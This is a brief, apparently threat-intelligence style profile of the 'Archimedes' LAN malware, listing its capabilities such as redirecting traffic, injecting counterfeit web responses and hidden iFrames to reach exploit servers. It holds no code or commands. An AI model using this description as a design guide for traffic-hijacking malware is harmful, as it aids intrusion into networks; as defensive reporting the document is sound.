Archimedes - Malware Platform

Archimedes is able to infiltrate and attack systems inside a Local Area Network (LAN). According to researchers, this exploitation tool can be used to redirect LAN traffic from a target system to a remote attacker.

The malware injects a counterfeit web server response into a user's web browser which can redirect the browser to random malicious destinations, typically an exploit server which provides the appearance of a normal browsing session.

The user guide for Archimedes refers to the malware as an updated version of another tool named 'Fulcrum'. Archimedes offers several improvements on the previous tool.

There are four know versions of Archimedes (1.0, 1.1, 1.2 and 1.3), the modifications introduced with each new version of Archimedes adds new functionality but does not change the default behaviour of the original tool.

Archimedes can perform the following tasks:
Disable the route verification check that occurs prior to exploitation.
Support for a new HTTP injection method based on using a hidden iFrame.
Modification of the DLLs to support the ‘Fire and Forget’ mythology.
Provide a method for the attacker to shut down the tool on demand.